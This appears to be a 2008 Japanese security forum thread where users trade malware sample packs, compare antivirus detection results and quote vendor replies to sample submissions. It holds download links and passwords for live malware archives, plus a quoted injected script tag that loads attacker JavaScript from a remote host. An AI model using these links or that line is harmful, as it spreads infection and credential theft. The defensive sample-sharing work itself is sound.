>montagens.fotos.scr - Trojan:W32/VB.BLN
>SoftwareSetup.exe - Trojan-Downloader:W32/FraudLoad.BQ
>
>No detection needed:
>totalsecure.s3 - data file, non executable
>totalsecure.s2 - data file, non executable
>totalsecure.s6 - data file, non executable
>totalsecure.s5 - data file, non executable
>totalsecure.s4 - data file, non executable
>
>As for the file setup.exe, it contains the file ErrorRepairTool.exe we will further look into this applicartion.
>
>regards,

b,5追加対応

結果: マルウェア 1 が検出されました。
Trojan-Downloader:W32/FraudLoad.BQ (ウィルス)
    * C:\Documents and Settings\\Malware\b\SoftwareSetup.exe 処理: 削除済み 

リスクウェアが見つかりました。
Rogue:W32/RealAntiSpyware.A (リスクウェア)
    * C:\Documents and Settings\\Malware\5\antispyware_setup.exe 

これで
>>398はゼロ番除いて対応

>>416
じゃあ、中身は真っ黒だなベリサイン。。。>427で悩むわけだw

>>423
すんげーマイナーな機能を突かれて、おかしなところに展開されたら痛いから、
砂箱内に展開するようにしては。

>>429
署名目的が、時刻証明のやつかな…。 (出先なのでブツ見れてない)

ttp://www.tane.sakuratan.com/upload/upload.cgi?mode=dl&file=79
Malware-Pack42

>>431乙
NIS2009で 4/12 （0、3、8、a）
未検出は贈っておきました

>>431
0. ttp://www.virustotal.com/analisis/0640f201fa422d54092e98cf4974903b
1. ttp://www.virustotal.com/analisis/c5be3ae7cfe4c96e873f8a353e6d9201
2. ttp://www.virustotal.com/analisis/5a7e49e9574f38cf9bfdcb798c9a0b50
3. ttp://www.virustotal.com/analisis/3b830fef8238e67c6501409f8ed982c8
4. ttp://www.virustotal.com/analisis/dce7161107d26df1ba1664164ea5cfba
5. ttp://www.virustotal.com/analisis/a003572f0ce0bf084508a9b26469008c
6. ttp://www.virustotal.com/analisis/fd557ebb29b3a58f3536c9fd9b1a6be6
7. ttp://www.virustotal.com/analisis/51fc1c2817ab0900ce250085709979bb
8. ttp://www.virustotal.com/analisis/ab35c38cc81bf1619ac3689c27152a21
9. ttp://www.virustotal.com/analisis/1db3d476473623b08aea48ec9a52fb19
a. ttp://www.virustotal.com/analisis/b230cc10dd99535e1535ff554cf7bf96
b. ttp://www.virustotal.com/analisis/ebb1fc3f7e3d1e879feb0513a810e749

>>431

K7AntiVirus 9.5.0556
4/12
Malware\0,xcodec.207.exe,Infected by Trojan-Downloader.Win32.Zlob.zgg,Cleaned ,
Malware\3,setup.ver1_1000.0_.exe,Infected by Trojan.Win32.Malware.1,Cleaned ,
Malware\7,iftp.com,Infected by Trojan-Downloader.Win32.Banload.uka,Cleaned ,
Malware\a,HotProtector.exe,Infected by Trojan-Downloader.Win32.VB.hue,Cleaned ,

>>433では５番検出してるのに俺のAntiVirでは検出しない・・・
VTは7.8使ってるけどパソコンに入ってるのは８だからかな？
ちなみに入っているのはプレミアムです。

まぁでもとりあえず　9/12
0 TR/Dldr.Zlob.geb [trojan]
1 DR/Fraud.AntiVirusPro.F [dropper]
2
3 TR/Fakealert.PT [trojan]
4 TR/Dldr.Delf.nxn [trojan]
5
6 TR/Spy.Banker.Gen [trojan]
7 TR/Dldr.Banload.Uka.1 [trojan]
8 TR/Drop.Age.2005796 [trojan]
9 HTML/Crypted.Gen [virus]
a TR/Crypt.NSPM.Gen [trojan]
b

http://www3.uploader.jp/dl/ikedango/ikedango_uljp00001.cab

>>435
うちのやつだと5はヒューリスティックで検出してきたからレベル上げたら引っかかるんじゃね？
レベルはHighにしてる

>>438
highにしたら引っかかりました。

>>433
みんなのところはVirustotalにシマンテックの項目でてる？

>>431
McAfeeに送らせて頂きました。
>>440
でてます。

あるのとないのあるな。分母の数も35or36と違うし

あれなんだろうね
リアナライズしたら増えたり減ったりする事もあるし

0-3-4-5-6-7-8-a検出　8/11撃墜

2008/09/22 2:34: ファイル C:\Documents and Settings\\Malware\0\xcodec.207.exe に不正なコードを検知しました。 
感染: Trojan-Downloader.Win32.Zlob.zgg 
2008/09/22 2:34: ファイル C:\Documents and Settings\\Malware\3\setup.ver1_1000.0_.exe に不正なコードを検知しました。 
感染: Trojan-Downloader.Win32.FraudLoad.vcek 
2008/09/22 2:34: ファイル C:\Documents and Settings\\Malware\4\UsbDrv.com に不正なコードを検知しました。 
感染: Trojan-Downloader.Win32.Delf.nxn 
2008/09/22 2:34: ファイル C:\Documents and Settings\\Malware\5\_svideo.com に不正なコードを検知しました。 
感染: Trojan-Downloader.Win32.Banload.vxe 
2008/09/22 2:34: ファイル C:\Documents and Settings\\Malware\6\_video.com に不正なコードを検知しました。 
感染: Trojan-Downloader.Win32.Banload.vtq 
2008/09/22 2:34: ファイル C:\Documents and Settings\\Malware\7\iftp.com に不正なコードを検知しました。 
感染: Trojan-Downloader.Win32.Banload.uka 
2008/09/22 2:34: ファイル C:\Documents and Settings\\Malware\8\eAntivirusProInstaller.exe に不正なコードを検知しました。 
感染: Trojan-Downloader.Win32.FraudLoad.vcem 
2008/09/22 2:34: ファイル C:\Documents and Settings\\Malware\a\HotProtector.exe に不正なコードを検知しました。 
感染: Trojan-Downloader.Win32.VB.hue 

>>444はF-Secure2009

>>444の追加
1-2番　直接スキャンで追加検出

ｷﾀ━(ﾟ∀ﾟ)━(∀ﾟ )━(ﾟ　 )━(　　)━(　　)━(　 ﾟ)━( ﾟ∀)━(ﾟ∀ﾟ)━ !!

>>431
Rising Antivirus 2009 21.01.30 (20.63.05.00) Last Update Time=2008-09-18 14:19
スルー
まだ2009用の定義は不定期配信ぽいのでだめだな・・

>>431
カスペ
2,9,bを検出しないので送りました

>>398
カスペからの返事.古いが、一応…。

2008/09/18 (木) 11:41 SoftwareSetup.exeについて
Hello.
New malicious software was found in the attached file.
It's detection will be included in the next update. Thank you for your help.

Trojan-Downloader.Win32.FraudLoad.vcej


2008/09/20 (土) 0:33,2:34
Hello,

TotalSecure2009.exe_,antispyware_setup.exe_

No malicious code was found in this file.

Please quote all when answering.


9/12
（うち、0\setup.exeについては、未だ回答待ちorz)

最近反応遅いようなorz

>>431
Rising Internet Security 2009 21.00.10 (20.63.07.00) Last Update Time=2008-09-22 16:00 6\_video.com: Trojan.Spy.Banker.GEN
7\iftp.com: Trojan.Spy.Win32.Banker.mcm
a\HotProtector.exe>>mian007: Packer.Win32.Mian007.a

すまん改行1個無視された

http://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=80
pass:Malware
http://www.virustotal.com/jp/analisis/5244ea7c98dd74c45436a4fc3612c00a

>>453
McAfeeスルーヽ(`Д´)ﾉ

>>453
スルー

検体提出

ttp://tane.sakuratan.com/
ファイルのサイズが小さく↑へは上げられないので
ttp://www5.uploader.jp/home/tane/←ここで

ttp://www5.uploader.jp/dl/tane/tane_uljp00089.zip.html
解凍パス：infected
ＤＬパス：virus
左クリックではエラー、ダウンロード不可
右クリック、対象をファイルに保存でダウンロード可

ttp://www.virustotal.com/jp/analisis/ed21a0b4f24764c7d53e64a326c2ab1a

McAfee送信済み

>>456
間違えたので後で訂正します

>>455
返事来た
> Hello,
> 
> Thank you for your e-mail.
> 
> The file you sent was found to be malicious. An appropriate detection will be added in one of the next database updates.
> 
> Our latest database updates are available here:
> 
> http://www.f-secure.com/download-purchase/updates.shtml
> 
> Have a nice day!

>>453
対応完了

>>456
撃墜済み

カスペ
2.htm　Trojan-Downloader.JS.Agent.cqv
inform.com　Trojan-Spy.Win32.Delf.egb
AntiMalware2009Installer.exe　not-a-virus:FraudTool.Win32.Agent.cn
対応しました

>>453
ノートンに提出した

>>453
ノートンがDownloader.MisleadAppで検出するようになった
即返信が来たところをみると、すでに誰かが送った後だったのかな

ttp://www.tane.sakuratan.com/upload/upload.cgi?mode=dl&file=81
Malware-Pack43

>>463
0-3-4-6-7-a-b検出　7/11撃墜

2008/09/25 4:41: ファイル\\Malware\0\updater_1_42941010.exe に不正なコードを検知しました。 
感染: Trojan-Ransom.Win32.Hexzone.ic 
処理: ファイルを削除しました。 
2008/09/25 4:41: ファイル\\Malware\3\meane.stf に不正なコードを検知しました。 
感染: Trojan-Downloader.Win32.Agent.agzq 
処理: ファイルを削除しました。 
2008/09/25 4:41: ファイル\\Malware\4\load.exe に不正なコードを検知しました。 
感染: Trojan.Win32.Pakes.kna 
処理: ファイルを削除しました。 
2008/09/25 4:41: ファイル\\Malware\6\setup.exe に不正なコードを検知しました。 
感染: Trojan-Downloader.Win32.Zlob.zko 
処理: ファイルを削除しました。 
2008/09/25 4:41: ファイル\\Malware\7\MultyCodecUpgr.7.exe に不正なコードを検知しました。 
感染: Trojan-Downloader.Win32.Agent.ahfd 
処理: ファイルを削除しました。 
2008/09/25 4:41: ファイル\\Malware\a\free.porn.movie.exe に不正なコードを検知しました。 
感染: Trojan-Dropper.Win32.Agent.wze 
処理: ファイルを削除しました。  
2008/09/25 4:41: ファイル\\Malware\b\xcodec.103.exe に不正なコードを検知しました。 
感染: Trojan-Downloader.Win32.CodecPack.ac 
処理: ファイルを削除しました。 

>>463
未検出検体を提出

http://www.lineagecojp.com/movie/mov0023.zip

>>463
�d
カスペ2009 @ 19:21:00
7/12
>>464と同じだった。
検体提出します。

Detected Trojan program Trojan-Ransom.Win32.Hexzone.ic0/updater_1_42941010.exe
Detected Trojan program Trojan-Downloader.Win32.Agent.agzq3/meane.stf
Detected Trojan program Trojan.Win32.Pakes.kna4/load.exe
Detected Trojan program Trojan-Downloader.Win32.Zlob.zko6/setup.exe//PE_Patch.UPX
Detected Trojan program Trojan-Downloader.Win32.Agent.ahfd7/MultyCodecUpgr.7.exe
Detected Trojan program Trojan-Dropper.Win32.Agent.wzea/free.porn.movie.exe
Detected Trojan program Trojan-Downloader.Win32.CodecPack.acb/xcodec.103.exe

>>463
未検出をMcAfeeに送らせて頂ました。
>>466
ttp://www.virustotal.com/jp/analisis/a6f4b35ad864a0bce76598aa7ac61e11

>>463
Avira Free 1,3,9スルー
検体提出しておきます

>>463
Rising Internet Security 2009 21.00.30 (20.63.20.00) Last Update Time=2008-09-24 14:21
8\xh-codec.v.1.189.exe>>$TEMP\11892.exe: Trojan.Win32.DNSChanger.drb

>>463
VT

0 26/36 http://www.virustotal.com/analisis/c174f9f41a8e1a12f6a9a3437198307a
1 12/36 http://www.virustotal.com/analisis/3f574b09ecee08903bc08c32a19c9848
2 _9/36 http://www.virustotal.com/analisis/5ecee31b467db131d4299f021aec8a2b
3 26/36 http://www.virustotal.com/analisis/c09d2ba39f57444d52a9357b6a7be64c
4 22/36 http://www.virustotal.com/analisis/62c206661015bb503c51109912761213
5 _9/36 http://www.virustotal.com/analisis/b3b31d025b48c204b4c5e8575c7568ac
6 19/36 http://www.virustotal.com/analisis/568723e8914762514cad3b0bbd84ab3c
7 14/36 http://www.virustotal.com/analisis/dc4f3763920d3cf05886465e52098f51
8 12/36 http://www.virustotal.com/analisis/73b46b69878b93e50db2c74d31ea77a8
9 14/36 http://www.virustotal.com/analisis/1e742cdcc12965d4ae22e082a2f23fb3
a 26/36 http://www.virustotal.com/analisis/c174f9f41a8e1a12f6a9a3437198307a
b 16/36 http://www.virustotal.com/analisis/c57907cacbcd0c3685d52e17262abd41

0 を
0 11/36 http://www.virustotal.com/analisis/622f8cf1679b1227563e77a521078bdf

に訂正

>>463

K7AntiVirus 9.5.0558
2/12
Malware\4,load.exe,Infected by Trojan.Win32.Small.HAFF,Cleaned ,
Malware\a,free.porn.movie.exe,Infected by Trojan-Dropper.Win32.Agent.wze,Cleaned ,

>>463乙
NIS2009で 4/12 （3、6、9、b）
未検出は贈っておきました

antivir
10/12
残り提出します。

レス読んでたら、すでにAntiVirの結果書いてあって提出してくれたのね・・・
>>469では1,3,9が未検出って書いてありますけど、解凍時はそうなりますが手動で3番撃墜します。

>>463
2-8-9追加対応
2008/09/26 1:33: ファイル \Malware\2\favicon.exe に不正なコードを検知しました。
感染: Trojan:W32/Agent.GCL
処理: ファイルを削除しました。
2008/09/26 1:33: ファイル\Malware\8\xh-codec.v.1.189.exe に不正なコードを検知しました。
感染: Trojan-Dropper:W32/Agent.FEW
処理: ファイルを削除しました。
2008/09/26 1:33: ファイル \Malware\9\getexe に不正なコードを検知しました。
感染: Trojan-Downloader:W32/Agent.HQN
処理: ファイルを削除しました。

12:25にF-Secureから対応済みとメール受信
F-Secure Security Labs さんは書きました:
>Hello,
>
>Files will be detected:
>favicon.exe Trojan:W32/Agent.GCL
>xh-codec.v.1.189.exe - Trojan-Dropper:W32/Agent.FEW
>getexe - Trojan-Downloader:W32/Agent.HQN
>
>setup_1_1_.exe - file is corrupted
>SmartDownload.exe - casino related application downloader which currently we do not detect.
>
>regards

以上,

http://www.youturebe.com/gungho08/guide/makeitem.rar

http://www.youturebe.com/gungho08/guide/makeitem.zip

>>479
http://www.virustotal.com/analisis/72b99e57716ffb12da3a84972d449207

>>463
カスペからの返事

Hello,

SmartDownload.exe_,
xh-codec.v.1.189.exe_

No malicious code were found in these files.

favicon.exe_ - Trojan.Win32.Agent.aexd,

getexe - Trojan-Dropper.Win32.Agent.xgo,

setup_1_1_.exe_ - Trojan.Win32.FraudPack.adn

New malicious software was found in these files. Detection will be included in the next update. Thank you for your help.

Please quote all when answering.

>>398,414
setup.exeも白

http://pc11.2ch.net/test/read.cgi/sec/1140517079/
あやしいファイルを実行するスレより

952 名前：名無しさん＠お腹いっぱい。[] 投稿日：2008/09/28(日) 12:53:56
http://1039045726:65535/jp.js

953 名前：名無しさん＠お腹いっぱい。[sage] 投稿日：2008/09/28(日) 15:09:41
本体t.gif.gif

954 名前：名無しさん＠お腹いっぱい。[sage] 投稿日：2008/09/28(日) 15:56:58
>>952
ttp://www.google.co.jp/search?hl=ja&q=http%3A%2F%2F1039045726%3A65535%2Fjp.js&btnG=Google+%E6%A4%9C%E7%B4%A2&lr=&aq=f&oq=
Lineage II 板「<script src=http://1039045726:65535/jp.js></script>」
最近このサイトを見た方は、 ウイルスチェックとパスワードの変更をお勧めします。
>>追記これは少し前に XREA がやられた時と同じタイプなので、 （省略されました・・全てを読むにはここを ...
jbbs.livedoor.jp/game/7135/ - 39k - キャッシュ - 関連ページ - メモをと

ttp://www.virustotal.com/jp/analisis/89ecab35bb571338676d641fa814cca7

>>482
シマンテックに送りました

>>482
AVGに提出した

カスペからの返事
別件でしつこく催促してたら、1ヶ月前の検体提出結果今頃来た。orz

>>211
\9\index2.html

Hello.
New malicious software was found in the attached file.
It's detection will be included in the next update. Thank you for your help.

Trojan.JS.Agent.cg

Sincerely yours,
Andrey Bezborodov,
Virus Analyst.

>>482
カスペにも送付

>>482
カスペからの返事


Hello,

jp.js_

No malicious code was found in this file.

Please quote all when answering.

--
Best regards, Andrey Ladikov
Virus analyst, Kaspersky Lab

>>482 が最終的に実行するトロイ
ttp://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=82
virus

>>488
AVGにおくりました。

>>488
McAfeeおつかいいってきます

WebImmuneの自動解析結果
xrea1.exe / new detection / pws-mmorpg.gen
xrea1t.exe / new detection / generic pws.y

というわけで近日対応の模様

>>488

http://www.virustotal.com/analisis/4d92df96015abb5b549e1d422add05da
http://www.virustotal.com/analisis/8a2c51ad0b7dc28ae9990c413cb7d47a

>>488
シマンテックにも贈りました

検体送るとなんか貰えるの？

メール(一部

>>494
>>397

>>495
なるほど

>>488
McAfeeに送らせて頂ました。
Extra.datが送られてきました。

McAfeeも最近対応速くなった？

>>498
usには送った事がありませんが
jpには以前送ったことがあります
特に最近速くなったとは感じません

複数の検体を一つのzipで送るよりも
個別に送る様にするといい感じかもです

>>487
その先にある SWF ファイルを全部送った。対応完了 by KIS7

ttp://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=82
virus

ttp://www.tane.sakuratan.com/upload/upload.cgi?mode=dl&file=84
Malware-Pack44

McAfeeには提出済み

>>502
Rising Internet Security 2009 21.00.70 (20.63.62) Last Update Time=2008-09-28 13:27
1\xxz.exe: Trojan.Win32.Undef.qjt
2\DJ12335.exe: Packer.Win32.Agent.r
9\mensagem102982.exe: Packer.Win32.Agent.r

>>502
3-7-9検出
提出は後時

AntiVir 7/12
0
1 RKIT/Agent.aav [trojan]
2 R/Crypt.XPACK.Gen [trojan]
3
4 TR/Crypt.XPACK.Gen [trojan]'
5
6 TR/Clicker.LA [trojan]
7 DR/Delphi.Gen [dropper]
8 TR/Dropper.Gen [trojan]
9 TR/Crypt.XPACK.Gen [trojan]
a
b

残り提出

>>502
�d
カスペ2009
4/12 (1,3,7,9)

Detected Trojan program Heur.Trojan.Generic 1/xxz.exe
Detected Trojan program Trojan.Win32.Agent.aeyv 3/D4722.exe
Detected Trojan program Trojan.Win32.Agent.aexs 7/load.exe
Detected Trojan program Trojan-Downloader.Win32.Banload.wdp 9/mensagem102982.exe

検体提出します。

ttp://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=85
解凍パス：infected
ＤＬパス：virus
ttp://www.virustotal.com/jp/analisis/3b5e1dd4f23152a73f19113e6f2d1e5c
McAfee提出済み

>>507
Rising Internet Security 2009 21.01 (20.64.12.00) Last Update Time=2008-09-30 13:52
jpsex.exe>>k1.exe>>upack0.32>>CABINET>>1.exe: Trojan.Win32.Agent.zri

>>502
追加検出なし

>>507
パックされていて、k1.exeと共にちゃんとエロ動画(RM形式？)入ってますねｗｗ
k1.exeだけの提出も必要かも。

>>502乙
NIS2009で 4/12 （3、7、8、b）
未検出は贈っておきました
>>507乙

各自確認しておいて下さい
FlashGet 1.8.8.1010 日本語版 （Prevx1 でSuspiciousの検出反応あり）
ttp://flashget.brothersoft.jp/download-FlashGet/1113

ブラザーソフトなんか使っちゃダメ！

>>502

カスペからの返事（提出9ファイル内4つ)

Hello,

b > MSCodecLite.7.exe_ - Trojan-Downloader.Win32.CodecPack.at,
6 > w.bin - Trojan-Downloader.Win32.Delf.owb
8 > PCAntispy_Installer_jpn.exe_ - not-a-virus:FraudTool.Win32.PC-AntiSpy.j

New malicious software was found in these files. Detection will be included in the next update. Thank you for your help.

a >setup.exe_

No malicious code was found in this file.

カスペ 7/12(黒：1,3,6,7,8,9,b; 白：a; 回答待ち: 0,2,4,5)

ブラザーと牛&蠍は絶対につこうたらいかん

http://apple.mydns.to/uploader/65598011.zip

>>502
マイシールド（V3ウイルスブロック） 2008.10.01.03
12個中1つ（bのみ）しか検出できなかった…。
ウイルスキラーと同等ぐらい欲しかったけれど、それ以下か。

http://unti-p2p-gnx.hp.infoseek.co.jp/GN-X.zip

意外とマイナーなベンダーの使ってる人って多いのかね？
このスレに登場する顔ぶれも多様じゃのう

>>516
ttp://www.virustotal.com/jp/analisis/f3740f38f76a4e5ad7ecc321a5b8b97c
一応McAfeeに提出させて頂ました。

>>502,512

カスペからの返事。6:20AM。今回は、検体名記載なし。
Hello.
New malicious software was found in the attached file.
It's detection will be included in the next update. Thank you for your help.

>>506を19:25:00で再スキャンした結果。9/12 (1,2,3,4,6,7,8,9,b)。たぶん、これで確定。

Detected Trojan program Trojan.Win32.Agent.afkx 1\xxz.exe ← NEW シグネチャに変更
Detected Trojan program Trojan-Downloader.Win32.Dadobra.bjy 2\DJ12335.exe ← NEW
Detected Trojan program Trojan.Win32.Agent.aeyv 3\D4722.exe
Detected Trojan program Trojan-Proxy.Win32.Agent.bbb 4\aanew.exe ← NEW
Detected Trojan program Trojan-Downloader.Win32.Delf.owb 6\w.bin ← >>512で追加検知
Detected Trojan program Trojan.Win32.Agent.aexs 7\load.exe
Detected riskware not-a-virus:FraudTool.Win32.PC-AntiSpy.j 8\PCAntispy_Installer_jpn.exe ← >>512で追加検知
Detected Trojan program Trojan-Downloader.Win32.Banload.wdp 9\mensagem102982.exe
Detected Trojan program Trojan-Downloader.Win32.Small.aecf b\MSCodecLite.7.exe ← >>512で追加検知

【緊急!】ウイルス即行駆除方法【助けて!】Part3
http://pc11.2ch.net/test/read.cgi/sec/1214830385/424

ttp://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=86
dlkey security

http://pc11.2ch.net/test/read.cgi/sec/1214830385/413
http://pc11.2ch.net/test/read.cgi/sec/1214830385/419
http://pc11.2ch.net/test/read.cgi/sec/1214830385/422

より

↑
Kaspersky Virus.Win32.Sality.aa
Dr.WEB Win32.Sector.9

ネタ元 ttp://www.lac.co.jp/news/press20081002.html
ttp://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=87
virus

>>522 AVG提出済み

掲示板管理人殿
英語仕様なのでURLを提出してベンダーがアクセスできます。
ありがとう。

>>522
�d
カスペ2009
5/10

Detected Trojan program Trojan-Downloader.Win32.BHO.uy　　　　　iema.exe
Detected Trojan program Trojan.Win32.Inject.fcb　　　　　　　　　　　　tt1.exe
Detected Trojan program Trojan-Downloader.Win32.BHO.uz　　　　　tt2.exe
Detected Trojan program Trojan-GameThief.Win32.OnLineGames.tlps　x2.exe
Detected Trojan program Trojan-GameThief.Win32.WOW.ccx　　　　　x2_1.exe

検体提出します。

Rising Internet Security 2009 21.01.20 (20.64.32.00) Last Update Time=2008-10-02 13:59
>>520
tefrfa.cmd, spico.pif: Win32.KUKU.a
>>522
iema.exe>>upack0.39: Trojan.PSW.Iepass.e
tt2.exe>>upack0.34: Trojan.Win32.Agent.zri

McAfee

>>520
tefrfa.cmd, spico.pif : W32/Sality.ag

>>522
iema.exe : BackDoor-AWQ.b
tt1.exe : PWS-Lineage
tt2.exe : Generic PWS.y
x2.exe : PWS-Mmorpg.gen

>>520 >>522乙
シマンテックにも贈りました

え? オールスルー?

(・∀・)

>>522
未対応分をMcAfeeに提出させて頂きました。

ttp://subwiz.trendmicro.com/
でバスターに検体送ろうとしたら
Persits.Upload.1 error '800a0006'
There is not enough space on the disk.
ディスクがいっぱいですｗｗｗ

>>522
カスペから返事来ないが、3体追加検出。 8/10

Detected Trojan.Win32.Agent.afrt　　　　　 x1.exe
Detected Trojan-PSW.Win32.Agent.kxy　　　x1_2.exe
Detected Trojan.Win32.Agent.afrs x.exe

残り２つがCleanかは不明。

>>522
AntiVir　全部撃退

>>532
返事あった。
x_1.exe - Trojan.Win32.Agent.aftz
x1_1.exe - Trojan.Win32.Agent.aftx

ttp://www.tane.sakuratan.com/upload/upload.cgi?mode=dl&file=88
Malware-Pack45

McAfeeには提出済み

>>535
Rising Internet Security 2009 21.01.40 (20.64.52.00) Last Update Time=2008-10-04 14:03
2\DJ12335.exe: Packer.Win32.Agent.r
5\aklremover.exe: Trojan.DL.QQHelper.GEN

>>535乙
NIS2009で 3/12 （7、8、9）
未検出は贈っておきました

>>535
�d
カスペ2009

4/12 (0,4.7,8) 19：28：00 検体提出します。

Detected Trojan program Trojan-Dropper.Win32.Agent.xms　　　　　　　　tane0088.zip/Malware/0/c-setup.exe
Detected Trojan program Trojan.Win32.KillFiles.acn　　　　　　　　　　　　　tane0088.zip/Malware/4/charmap2.sys
Detected riskware not-a-virus:Downloader.Win32.FraudLoad.fx 　　　　tane0088.zip/Malware/7/av_2009.exe
Detected riskware not-a-virus:FraudTool.Win32.SpywareGuard2008.a　　tane0088.zip/Malware/8/SpywareGuard2008.exe


>>534確認。結局、>>522は10/10だったね。

>>535
antivir 7/12(0,1,2,4,7,8,b)
残り提出します

Antvirの結果を見ると検出数はさすがだね

Antvir厨の自作自演検体だからね
と、一時期Kaspersky叩きをしていた連中にｷｬﾝｺﾗｷｬﾝｺﾗほえられる

>>541
それはない。前からのコテハン。


もうウイルスが増えすぎてブラックリスト方式が難しくなってきたような
毎年10倍ずつ対数式に増えてるんだろ。スピアのウイルスもある。
いずれはホワイトリスト方式にするしかないような。
性善説から性悪説への転換。
ホワイトリスティングするには課題もあるだろうが。
シマンテックとかカスペルスキーもユーザー間でネットワーク組んで、DB集めて
スキャン省略したり、挙動を許可してる。
将来のCPUの多コア化を見越して、専用のコアに仮想化環境を割り当てて
砂箱判定してから、本環境で実行する構想もある。

http://rapidshare.com/files/150403205/WinRar_Keygen.zip

ここは鑑定スレじゃねえよ糞が、死ね

これですね

WinRAR　Part17
http://pc11.2ch.net/test/read.cgi/software/1222837887/69,106

69 名前：名無しさん＠お腹いっぱい。[sage] 投稿日：2008/10/04(土) 22:00:36 ID:4Lt7ywzx0
http://rapidshare.com/files/150403205/WinRar_Keygen.zip

106 名前：名無しさん＠お腹いっぱい。[sage] 投稿日：2008/10/05(日) 15:02:18 ID:p4QTRTnV0
http://www.virustotal.com/jp/analisis/977353ab0292cea800a3bee8a8e0b8b4

>>543
http://www.virustotal.com/jp/analisis/6371bc7bd2af99c49182387d3dc6a8a2

McAfeeに提出予定

>>543
McAfee提出させて頂ました。

http://www.cyokinde.com/ffxishowvide/16498897649.rar

>>548
>>338

>>548
http://www.virustotal.com/analisis/0978e7d100e4e3937c9aed652bdead33
AVG・・・

>>548
ウイルスチェイサーで撃退

>>548
AVG提出しました。

>>548-550
ZERO, avast, AntiVirで撃退

>>535
カスペからの返事

Hello,

9 > A9loader_77025301.exe_,
5 > aklremover.exe_,
6 > setup_mwc.exe_,
a > update.exe_

No malicious code were found in these files.（悪意のあるコードなし）

2> DJ12335.exe_ - Trojan-Downloader.Win32.Dadobra.bkl

This file is already detected. Please update your antivirus bases.(既に検知済み）

3 > inform.com_ - Trojan.Win32.Agent.afxq,
1 > item.gif_ - Trojan.Win32.Agent.afxs,
b > zcodec.0.exe_ - Trojan-Downloader.Win32.Agent.aivt

New malicious software was found in these files. Detection will be included in the next update. Thank you for your help.（マルウェア検出）

Please quote all when answering.


結局 4+追加4=8/12 (0,1,2,3,4,7.,8,,b)

検出

>>522 の更新。
ttp://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=89
virus

AntiVir Dr.WEB Kaspersky での全機撃墜を確認、
Nortonには提出済み。

>>556
McAfeeスルーヽ(`Д´)ﾉ

提出したWebImmuneの自動判定
sqlc1.exe new detection generic backdoor
wow1.exe new detection generic.dx
wow1_1.exe new detection generic pws.y
wow1_2.exe new detection generic pws.y

こいつらは近日対応する模様

ちなみにNortonの自動返信
filename: sqlinject1.exe
result: This file is detected as W32.SillyFDC
1匹しか検知してねぇ。

ttp://www.tane.sakuratan.com/upload/upload.cgi?mode=dl&file=90
Malware-Pack46

例によってMcAfeeには提出済み

AntiVir 9/12
残り提出

>>559
�d
カスペ2009＠9:15:00

8/12 (0,1,4,5,6,7,8,9)

Detected Trojan program Trojan.Win32.Pakes.ktq 　　　　　　　 Malware/0/video.cfg
Detected Trojan program Trojan.Win32.Inject.iol 　　　　　　　Malware/1/load.exe
Detected Trojan program Trojan.Win32.Monder.rcm 　　　　　　　Malware/4/winupdate.001
Detected Trojan program Trojan-Downloader.JS.Agent.csm Malware/5/1.gif
Detected riskware not-a-virus:FraudTool.Win32.Devushka.ae Malware/6/AntiMalware2009Installer.exe
Detected Trojan program Trojan-Downloader.Win32.Injecter.aqq Malware/7/load.exe
Detected Trojan program Trojan-Downloader.Win32.Zlob.aabo Malware/8/setup.exe
Detected Trojan program Backdoor.Win32.SdBot.hnj 　　　　　　　Malware/9/install_flash_player.exe

検体提出します。

0 http://www.virustotal.com/analisis/8c9f10ccfc4788fab99116a677d97fee
1 http://www.virustotal.com/analisis/61e8a6c8300aea8beab0db842b8ce38d
2 http://www.virustotal.com/analisis/892d81cc0ac6a431ef4d84214945447f
3 http://www.virustotal.com/analisis/018bb0a52353f7dce6d7581b0797b8db
4 http://www.virustotal.com/analisis/6862e7b9d7c5b3bfa132d86c7eb43b83
5 http://www.virustotal.com/analisis/51cb58fd8efdf839cb5cd4c239fd9d49
6 http://www.virustotal.com/analisis/a9953020f5a3b1b0d0bd99a92c71968c
7 http://www.virustotal.com/analisis/7635a467b4ca1c43fcb19bd25ceeab19
8 http://www.virustotal.com/analisis/1088956dacfb6e521ab8ce83b6bcc625
9 http://www.virustotal.com/analisis/9fcd40d074c3618ae54821c3392f8e04
a http://www.virustotal.com/analisis/f664d0d7f36ac8ab265fdd5480b78c93
b http://www.virustotal.com/analisis/521269733c782f0bc6fbb31ae40df6e9

キングもヨロ

>>559
カスペからの返事

Hello,

2 > c.exe_

This file is corrupted. （ファイル破損）

b > fix12.exe_ - Trojan.Win32.Agent.ageh,
3 > HDVideoExtension_ver1.5624.0.exe_ - Trojan-Downloader.Win32.Agent.ajco,
a > MSCodecLt.v.1.0.exe_ - Trojan-Downloader.Win32.Agent.ajcl

New malicious software was found in these files. Detection will be included in the next update. Thank you for your help.

Please quote all when answering.

--
Best regards, Sergey Prokudin
Virus analyst, Kaspersky Lab.

8+追加3=11/12 （2以外黒）

>>559乙
NIS2009で 5/12 （0、1、2、6、a）
未検出は贈っておきます

Kingsoft Internet Security U

>>556
sqlc1.exe検出

>>559
Malware/9/install_flash_player.exe検出

どちらも未検出検体は提出済み

http://vamp.s9.xrea.com/updata2/3007.zip

>>567
>>3

トヨタのページ（http://toyota.jp/) が反応したので
http://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=91
pass virus

kaspersky
感染しています: トロイの木馬 Trojan.JS.Agent.db　Content.IE5\K0U9DY55\v53[1].js


http://www.virustotal.com/jp/analisis/244f0c65d06196ff458b2ed72e1e0b7f

>>569
TOYOTA
大変申し訳ありませんが、該当ページがございません。
トップページへご案内いたします。
このページをブックマーク登録されていた方は、
お手数ですがブックマークの変更をお願いいたします。
トヨタ自動車株式会社
なお、このページは５秒後に自動的にジャンプします。
※自動的にジャンプしない場合は、上記のリンクをクリックして下さい。
(c) TOYOTA MOTOR CORPORATION. All Rights Reserved.

>>570
）までリンクされている
ttp://toyota.jp

こりか。。。
ttp://so.7walker.net/index.php?site=http%3A%2F%2Fsecure-jp.imrworldwide.com%2Fv53.js&hua=&phishing=on
ttp://www.siteadvisor.com/sites/imrworldwide.com

シマンテックから爆速で返事北

> Developer notes:
> v53.js contains no malicious code.

>>569
McAfeeに提出させて頂ました。

>>569
(´･ω･`) ?
ttp://www.virustotal.com/analisis/ac0a33a4db6109ccb44a53db30a07b11

>>575
>>569
